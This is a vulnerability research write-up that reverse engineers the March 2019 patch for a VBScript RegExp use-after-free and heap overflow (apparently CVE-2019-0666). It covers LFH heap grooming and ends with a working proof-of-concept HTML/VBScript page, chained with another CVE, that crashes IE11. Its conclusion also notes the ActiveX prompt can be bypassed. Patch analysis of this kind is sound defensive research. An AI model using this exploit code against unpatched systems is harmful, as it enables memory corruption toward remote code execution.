Apr 02, 2019

Vulnerability Research

Analysis of a VB Script Heap Overflow (CVE-2019-0666)

Marcus Hutchins

Anyone who uses RegEx knows how easy it is to shoot yourself in the foot, but is it possible to write RegEx so badly that it leads to RCE? With VB Script, the answer is yes!

In this article I’ll be writing about what I assume to be CVE-2019-0666. The March 2019 security patch fixes multiple bugs in the same code, so the CVE number is uncertain.

Note: I did not find this bug; I reverse engineered it from the March 2019 security patch.

Binary Comparison

Running BinDiff against the pre- and post-patch VBScript.dll, we can see that only a few changes are returned.

Difference between VBScript before and after installing the latest patch.

The two changes in the RegExp class caught my eye. It’s easy to see how a bug could occur in something as complex as a RegEx parser. Let’s start here.

RegExp::AddRef

Old AddRef on the left, updated one on the right.

This change is very simple, but requires an understanding of reference tracking:

A reference to an object is created: the reference counter is incremented by 1.
A reference to an object is deleted: the reference counter is decremented by 1.
The reference counter reaches 0: the object can be deleted.

Reference tracking is designed to prevent deallocation of in-use objects (use-after-free). An object ~~will~~ should never be deleted until all its references are destroyed.

The updated function causes the interpreter to exit if the reference count increments above 0x7FFFFFFF (the highest value of a signed 32-bit integer). The reason for the update is to prevent a potential integer overflow.

Theoretically, by creating enough references, one could loop the reference counter back around to zero. Once the counter is zero, the object could be freed while references still exist.

In reality, to cause an integer overflow we’d have to create 4,294,967,296 references. Optimistically assuming a single reference is only 4 bytes, that’d require around 17 GB of RAM. Though, we’d hit the interpreter memory limit long before.

Alone, this bug is not a threat; however, in combination with another bug (for example, a reference leak) it could lead to use-after-free (UAF).
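To make the arithmetic concrete, here is a toy Python model of a 32-bit reference counter. It is only a sketch: the function names are made up for illustration, and the 4-bytes-per-reference figure is the same optimistic assumption used above, not something taken from VBScript.dll.

```python
# Toy model of a 32-bit reference counter; not VBScript's actual code.
MASK_32 = 0xFFFFFFFF
INT32_MAX = 0x7FFFFFFF

def add_ref_unpatched(count):
    """Increment with 32-bit wraparound, as an unchecked counter would."""
    return (count + 1) & MASK_32

def add_ref_patched(count):
    """Increment, but refuse to go past INT32_MAX (modelled on the patched check)."""
    if count >= INT32_MAX:
        raise OverflowError("reference count limit reached")
    return count + 1

refs_to_wrap = MASK_32 + 1          # increments needed to come back round to zero
bytes_needed = refs_to_wrap * 4     # assuming 4 bytes per reference
wrapped = add_ref_unpatched(MASK_32)

print(refs_to_wrap, bytes_needed / 10**9, wrapped)
```

The last increment of the unchecked counter lands on 0, which is exactly the state in which an object looks safe to free while references to it still exist.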

RegExpExec::ReplaceUsingCallable

Note: this function is too large to embed in full, so I’ve pulled out only the relevant changes.

The code now creates a copy of the memory pointed to by a6 (argument 6). To understand the reasoning for this, let’s look at the next modification.

Change 2: somewhere in the middle of RegExpExec::ReplaceUsingCallable.

The old code verified that a6 pointed to Buf1. Now there exists an additional check comparing Buf1 with the copy of *a6 made earlier (Buf2).

The very existence of code validating that a6 points to Buf1 tells us something important: a6 should point to Buf1, but there’s a possibility it might not. Furthermore, the new check implies it may be possible to change Buf1 between the first and second call to Exec.

Already, I’m fairly sure we’re looking for a use-after-free. The update is now verifying that a6 still points to Buf1, and that Buf1’s content hasn’t changed.

There’s a logical reason these two checks would co-exist: Buf1 is some allocated memory, which can be freed during the call to ReplaceUsingCallable(). Assume Buf1 was freed, and something else was allocated in its place: *a6 would still point to Buf1, but Buf1 would now contain different data. Now the code has been patched to also validate that Buf1 remains unchanged.
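The difference between the two checks can be sketched with a toy heap in Python. This is a hypothetical model of my reading of the patch, not the decompiled code: `heap`, `slot`, `old_check` and `new_check` are illustrative names, with `slot["ptr"]` standing in for *a6 and `snapshot` standing in for Buf2.

```python
# Toy heap: maps an address to the bytes stored there. Hypothetical model only.
heap = {0x1000: b"compiled:a"}

def old_check(slot, buf1_addr):
    """Pre-patch: only confirm the slot still points at the original address."""
    return slot["ptr"] == buf1_addr

def new_check(slot, buf1_addr, snapshot):
    """Post-patch: also confirm the bytes at that address match the earlier copy."""
    return slot["ptr"] == buf1_addr and heap.get(slot["ptr"]) == snapshot

slot = {"ptr": 0x1000}      # stands in for *a6
buf1_addr = slot["ptr"]     # stands in for Buf1
snapshot = heap[buf1_addr]  # stands in for Buf2, the copy made up front

# During the callback: the buffer is freed and a different one lands at the same address.
del heap[0x1000]
heap[0x1000] = b"compiled:b"

print(old_check(slot, buf1_addr), new_check(slot, buf1_addr, snapshot))
```

The address-only check still passes after the swap, while the check that also compares contents fails, which is the gap the patch appears to close.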

To understand the patched bug more, we need to understand RegExp.

RegExp Replace

RegExp has a replace function which replaces one or more matches of a given pattern with a given value. Take this code for example:

Set regex = New RegExp
regex.Pattern = "a"
regex.Global = False
MsgBox regex.replace("aaa", "b")

The above code would replace the first instance of “a” in the string “aaa” with “b”; therefore, MsgBox would output “baa”. Stepping through the call, I found that internally the replace() method calls ReplaceUsingString(). We need to get to ReplaceUsingCallable(), and I’m pretty sure I know how.

ReplaceUsingCallable

As the name implies, we can probably call replace() using a callable object as a parameter. I did some more digging to figure out how [1].

The following code does the same as the previous version, but invokes ReplaceUsingCallable() instead.

Set regex = New RegExp
regex.Pattern = "a"
regex.Global = False
MsgBox regex.replace("aaa", GetRef("lolRegex"))

Function lolRegex(singleMatch, position, fullString)
    lolRegex = "b"
End Function

Basically, whenever the pattern gets matched the function “lolRegex” gets called (this is known as a callback). The callback must return whatever we want the pattern to be replaced with (in our case “b”).

Now I’m even more sure this is some kind of use-after-free. My guess is that during the callback we can free Buf1 and allocate something else at the same address. But first, we must know what Buf1 is.

The Mystery of Buf1

Buf1 is passed as a function argument, so I set a breakpoint at the start of ReplaceUsingCallable(). Once the breakpoint was triggered, I navigated to Buf1’s memory.

Using WinDbg to verify that Buf1 is in fact allocated on the heap.

Buf1 is allocated on the heap; there are also two “a” characters towards the end of the memory. Figuring the “a”s might be related to my RegEx pattern, I changed the pattern to “lolregex”.

Success! Now I know that Buf1 is related to my RegEx pattern.

My callback is invoked in the middle of ReplaceUsingCallable(), so I decided to modify the pattern there.

Set regex = New RegExp
regex.Pattern = "a"
regex.Global = False
MsgBox regex.replace("aaa", GetRef("lolRegex"))

Function lolRegex(singleMatch, position, fullString)
    'Change the RegEx pattern during the callback

    regex.Pattern = "I probably shouldn't be allowed to do this"
    lolRegex = "b"
End Function

The script returned the error code 0x80004005. A single location returns 0x80004005; it’s the pointer check from earlier.

I set a breakpoint on the pointer check and inspected both *a6 and Buf1. Buf1 is still the address of my old RegEx pattern (which has now been deallocated). Unfortunately, *a6 is now set to null. Exploiting this bug would require setting *a6 back to the address of Buf1.

Passing The Pointer Validation

After a fair amount of reverse engineering, I found the problem: although setting regex.Pattern to a new value frees Buf1, it doesn’t allocate a new buffer.

put_Pattern gets called when a value is assigned to regex.Pattern.

Digging deeper, I discovered the function RegExpComp::Compile() is responsible for creating Buf1. Unfortunately, we can’t explicitly call regex.compile() in VBScript (though in other languages it is possible).

Because compile() is a VTable function, I can’t just look at XRefs to see where it gets invoked. Instead, I set a breakpoint at the start of Compile(), then inspected the call stack.

Somewhat unsurprisingly, compile() gets invoked during a call to regex.replace(). By making a redundant call to replace() inside the callback, it’s possible to force compilation of my new pattern.

Set regex = New RegExp
regex.Pattern = "a"
regex.Global = False
MsgBox regex.replace("aaa", GetRef("lolRegex"))

Function lolRegex(singleMatch, position, fullString)
    regex.Pattern = "I probably shouldn't be allowed to do this"
    call regex.replace("", "") 'force pattern compile but do nothing

    lolRegex = "b"
End Function

Now when I run my script the check fails again, but for a different reason.

*a6 is set again, but not to the address of Buf1.

The problem here is simple: the new compiled pattern must be allocated at the same address as the old one. It’s not possible to explicitly decide where heap memory is allocated; however, there is a workaround.

Heap Exploitation Problems

I’m not going to go too deep into how the heap works here. If you’d like a more in-depth understanding, I suggest reading the original paper on “Heap Feng Shui” [2].

When allocating small blocks of memory, the heap allocator uses an algorithm to select some free space.

Heap Coalescing

Upon freeing a block, the heap allocator checks if either of the adjacent blocks is also free. If neighboring blocks are free, they are merged into a larger block (coalescing).

An example heap layout prior to Allocated Block 1 being freed.

Upon freeing Allocated Block 1, the freed space is merged with Free Block 1 & 2.

Coalescing is a problem when trying to exploit a use-after-free. If the block we need to reallocate is coalesced downwards, then the new buffer would be allocated at a lower address.
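Here is a small Python sketch of the effect, assuming a simplified heap described as an address-ordered list of `(start, size, is_free)` tuples. The layout values and the `free_block` helper are invented for illustration and do not reflect the real Windows heap structures.

```python
def free_block(blocks, index):
    """Mark blocks[index] free and merge it with any free neighbours.

    blocks is an address-ordered list of (start, size, is_free) tuples.
    """
    start, size, _ = blocks[index]
    lo = hi = index
    # Merge with the free block directly below, if there is one.
    if index > 0 and blocks[index - 1][2]:
        lo = index - 1
        start = blocks[lo][0]
        size += blocks[lo][1]
    # Merge with the free block directly above, if there is one.
    if index + 1 < len(blocks) and blocks[index + 1][2]:
        hi = index + 1
        size += blocks[hi][1]
    return blocks[:lo] + [(start, size, True)] + blocks[hi + 1:]

layout = [
    (0x00, 0x20, True),    # Free Block 1
    (0x20, 0x30, False),   # Allocated Block 1
    (0x50, 0x40, True),    # Free Block 2
    (0x90, 0x10, False),   # another live allocation
]
merged = free_block(layout, 1)
print(merged)
```

After the merge, the free region starts at 0x00 rather than 0x20, so an allocator carving a new block from the start of that region would hand back a different address than the one just freed.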

To stop coalescing from occurring, we can abuse the low-fragmentation heap (LFH).

The Low Fragmentation Heap

Heap allocations are inherently slow, due to the fact the allocator must search for a free block to fit the requested size.

The LFH improves performance by grouping together allocations of the same size. Let’s assume a 30-byte allocation is requested: if there’s a dedicated heap where all allocations are 30 bytes, then the allocator can simply return the first free block (no need to check the size). Because all blocks on the LFH must be the same size, coalescing is disabled.
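The idea can be sketched as a toy size-class allocator in Python. `BucketHeap` is a made-up class, and its reuse order (most recently freed slot first) is an assumption chosen to keep the example short; it is not a description of how the real LFH orders its free slots.

```python
class BucketHeap:
    """Toy size-class allocator: every slot in a bucket has the same size."""

    def __init__(self, slot_size, slot_count, base=0x1000):
        self.slot_size = slot_size
        # Free slots are tracked by address only; no per-block size is needed.
        self.free_slots = [base + i * slot_size for i in range(slot_count)]
        self.live = set()

    def alloc(self):
        addr = self.free_slots.pop(0)    # take the first free slot, no size search
        self.live.add(addr)
        return addr

    def free(self, addr):
        self.live.remove(addr)
        self.free_slots.insert(0, addr)  # slot is reused as-is, never merged

heap = BucketHeap(slot_size=30, slot_count=4)
a = heap.alloc()
b = heap.alloc()
heap.free(a)
c = heap.alloc()
print(hex(a), hex(b), hex(c))
```

Because slots are fixed-size and never merged, a freed slot keeps its exact address and can be handed out again to the next allocation of the same size, which is the property a use-after-free needs.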

Windows XP and earlier do not use the LFH by default. Though, this isn’t a problem because such systems are easy to exploit via other heap exploitation techniques (due to lack of mitigations).

LFH Allocation Order Randomization

On Windows 8 and above, a new mitigation was introduced to further complicate UAF exploitation. The LFH no longer allocates blocks consecutively; instead, the order is randomized. The allocator holds a list of free blocks, picking one at random each time an allocation is requested.

Luckily, LFH randomization is not a problem for us; I’ll explain why.

When a UAF exploit fails to re-allocate the target address, one of three things usually occurs:

The memory is left unallocated, in which case the program crashes trying to use uninitialized memory.
The memory gets re-allocated by something else, in which case the program crashes trying to use some random data.
The program performs sanity checks on the memory, failing safely if something unexpected is located there.

Remember the pointer check we’re trying to bypass? It basically validates the memory was allocated by a call to RegExpComp::Compile (i.e. contains a valid RegEx pattern). If we fail to re-allocate the same address, we won’t bypass the pointer check, thus the program won’t crash!

All we need to do is set up an exception handler, then just keep trying to allocate the new pattern at the old address. Whoever said security checks are bad for exploit developers?

'Just keep swimming...

On Error Resume Next

Set regex = new RegExp
regex.Global = False

'Re-allocate the pattern 20 times to enable LFH for this size allocation

For idx=0 To 19
    regex.Pattern = "aaaaa" 'same pattern (and size) as used in the loop below
    call regex.Replace("", "")
Next

'Attempt to trigger the use-after-free up to 5,000 times

For idx=0 To 4999
    regex.Pattern = "aaaaa"
    retval = regex.Replace("aaaaabbbbb", GetRef("lolRegex"))

    'if function returns successfully, then our use-after-free succeeded

    If retval Then
        MsgBox "Attempt number " & idx & " succeeded!", 48, "Great Success!!!"
        Exit For
    End If
Next

Function lolRegex(singleMatch, position, fullString)
    'replace pattern with one of same size so it goes on same LFH

    regex.Pattern = "bbbbb"
    call regex.Replace("", "") 'force pattern compile

    lolRegex = "c"
End Function

Running the new script, we’ll get something like this (even on Windows 10 with all heap mitigations enabled).
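To get a feel for why blind retrying is enough, here is a small Python simulation. It is a deliberate simplification: it assumes each replacement allocation lands in a uniformly random slot out of 64, which is an arbitrary number picked for the example and not a measured property of the LFH.

```python
import random

def attempts_until_reuse(slot_count, rng, max_attempts=5000):
    """Count tries until a random pick from the free slots hits the freed one.

    Each try models freeing the target slot, then allocating a replacement
    from a uniformly random free slot (a simplification of LFH randomization).
    """
    target = 0
    for attempt in range(1, max_attempts + 1):
        replacement = rng.randrange(slot_count)
        if replacement == target:
            return attempt   # the check passes, so the script stops retrying
        # Otherwise the check fails safely and we simply go round again.
    return None

rng = random.Random(1234)    # fixed seed so runs are repeatable
results = [attempts_until_reuse(64, rng) for _ in range(1000)]
hits = [r for r in results if r is not None]
print(len(hits), sum(hits) / len(hits))
```

Under these assumptions a failed attempt costs nothing, so the average number of tries sits near the slot count and the 5,000-attempt budget is rarely a limiting factor.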

Now the question is, how is this helpful? To use the LFH, both the old and new patterns must be of equal size. Why would replacing one RegEx pattern with another one of the same size be exploitable? Well, in this case size doesn’t matter…

A Pattern of Malicious Behavior

I went looking for allocations made based on data contained in the pattern buffer. Next I narrowed down the allocations to those made before I replace the pattern buffer, but used afterwards. I found one.

RegExpExec::Cgrp reads a variable from the compiled pattern called “Cgrp” (group).

After looking into the compilation of the pattern, I came to understand that “Cgrp” is the number of groups in the RegEx pattern. The allocation is done prior to calling ReplaceUsingCallable(); therefore, it persists throughout my reallocation of the pattern.

RegExpExec::ReplaceUsingCallable() makes multiple calls to a function named RegExpExec::Exec(). Exec() is responsible for performing the actual pattern matching; inside is the following code.

A memset call sets all bytes of the previously allocated group_array to 0xFF.

The memset is done based on my pattern’s Cgrp value, which I can change. If I recompiled the pattern with one of the same size, but with more regex groups, I’d overflow “group_array”.

For example, the pattern “aaaaaa” contains 1 group, whilst “(a)(a)” contains 2 groups and is the same length. Due to the fact the memset sets the entire buffer, the size of the pattern in each group is irrelevant.
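The size mismatch can be modelled in a few lines of Python using a bytearray as a stand-in for heap memory. The 8-byte entry size and the `exec_memset` helper are assumptions made purely for illustration; the real per-group size inside VBScript.dll is not stated here.

```python
def exec_memset(region, array_offset, entry_size, cgrp):
    """Fill cgrp entries with 0xFF starting at array_offset.

    Like the memset described above, it trusts cgrp and checks no bounds
    against the size the array was originally allocated with.
    """
    length = cgrp * entry_size
    region[array_offset:array_offset + length] = b"\xff" * length

ENTRY_SIZE = 8                       # assumed size of one group entry
original_cgrp, swapped_cgrp = 1, 2   # "aaaaaa" vs "(a)(a)"

# group_array is sized once, from the original pattern's group count.
array_size = original_cgrp * ENTRY_SIZE
region = bytearray(array_size + 64)  # group_array followed by neighbouring data

exec_memset(region, 0, ENTRY_SIZE, swapped_cgrp)
overflow = region.count(0xFF) - array_size
print(array_size, overflow)
```

With one extra group, one extra entry's worth of 0xFF bytes spills past the end of the array; every additional group in the swapped-in pattern extends the overflow by the same amount.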

RegEx(ploit) Requirements

In order to perform a successful heap overflow, there are some requirements.

Firstly, RegExpExec::Exec() must be called after I replace the pattern buffer. This can be done by setting the RegExp.Global option to True.

When Global is set, RegExpExec::ReplaceUsingCallable will replace every instance of the given pattern. The flow is as follows.

Call RegExpExec::Exec() to determine if there are any matches of the regex pattern in the source string.
If a pattern match is found, invoke the supplied callback.
Replace the match with the value returned by the callback.
If Global is set, loop over steps 1 to 3 until all matches are replaced.

What I can do is set Global to True, then create a string which matches the original pattern at least twice. When the callback is called, I will replace the pattern with one of the same size, but containing more groups. Upon the second call to Exec(), a heap overflow will occur.
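The control flow can be mimicked in Python with the standard `re` module. This is a harmless toy: `replace_using_callable`, `state` and `swap_pattern` are hypothetical names, and Python compiles a fresh, self-contained pattern on every pass, so nothing goes stale. The point is only to show the order of events.

```python
import re

def replace_using_callable(state, source, callback):
    """Toy version of the replace loop: Exec, callback, substitute, repeat."""
    events, out, pos = [], [], 0
    while True:
        # Step 1: "Exec" uses whatever pattern is current at this moment.
        events.append(("exec", state["pattern"]))
        match = re.compile(state["pattern"]).search(source, pos)
        if match is None:
            break
        # Step 2: the callback runs in the middle of the loop.
        replacement = callback(match.group(0), match.start(), source)
        # Step 3: substitute the callback's return value for the match.
        out.append(source[pos:match.start()] + replacement)
        pos = match.end()
        # Step 4: only go round again when Global is set.
        if not state["global"]:
            break
    return "".join(out) + source[pos:], events

state = {"pattern": "aaa", "global": True}

def swap_pattern(single_match, position, full_string):
    state["pattern"] = "(a)(a)"   # the callback swaps the pattern mid-replace
    return "c"

result, events = replace_using_callable(state, "aaaaaa", swap_pattern)
print(result, events)
```

The recorded events show the second "exec" already running against the swapped pattern. In VBScript, that second call is where buffers sized for the original pattern meet a group count taken from the new one.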

After some calculation, I found a single-group and a multi-group pattern of the same internal size. My malicious pattern contains 30 groups, whilst the original contains only 1.

malicious_pattern = "(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)"
original_pattern = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

The finalized code will overflow the heap with invalid data, leading to a program crash. For demonstration, I’ve chained the bug with CVE-2019-0768, which allows execution of VBScript in IE11.

<title>lolregex</title><meta content="IE=10" http-equiv="x-ua-compatible"></meta><script language="VBScript">
'Just keep swimming...

On Error Resume Next

malicious_pattern = "(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)(a)"
original_pattern = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" 

Set regex = new RegExp
regex.Global = True

'Re-allocate the pattern 20 times to enable LFH for this size allocation

For idx=0 To 19
    regex.Pattern = original_pattern
    call regex.Replace("", "")
Next

'Attempt to trigger the use-after-free up to 10,000 times

For idx=0 To 9999
    regex.Pattern = original_pattern

    'ensure source_string matches original_pattern by appending it twice

    source_string = original_pattern & original_pattern
    retval = regex.Replace(source_string, GetRef("lolRegex"))

    'if function returns successfully, then our use-after-free succeeded

    If retval Then
        MsgBox "Attempt number " & idx & " succeeded!", 48, "Great Success!!!"
        Exit For
    End If
Next

Function lolRegex(singleMatch, position, fullString)
    'replace pattern with one of same size so it goes on same LFH

    regex.Pattern = malicious_pattern
    call regex.Replace("", "") 'force pattern compile

    lolRegex = "c"
End Function
</script>

Now, let’s visit the page using IE11 on a system without the March 2019 security patch! I used Windows 7 because most crashes are silent on Windows 10.

Conclusion

The exploit offers a decent out-of-bounds (OOB) write primitive, which can be targeted at either the general or low-fragmentation heap. With such a primitive, it’s possible to escalate to arbitrary read/write, thus RCE. For obvious reasons, I will not be providing any information on how to achieve a weaponized exploit.

Interestingly, the “Enable ActiveX” prompt can be bypassed. Compiling the script into a safe-for-initialization ActiveX object leads to it being run immediately, without warning. Furthermore, the exploit can be triggered in any application that hosts the IE rendering engine. It may even be possible to trigger code execution from within an Office document, without macros enabled.

Anyway, that’s all! Thank you for coming to my talk on how to write safe and secure RegEx!

References

[1] VBScript RegEx Callbacks – http://cwestblog.com/2011/07/18/vbscript-regexp-replace-using-a-callback-function/
[2] Heap Feng Shui – https://www.blackhat.com/presentations/bh-europe-07/Sotirov/Presentation/bh-eu-07-sotirov-apr19.pdf
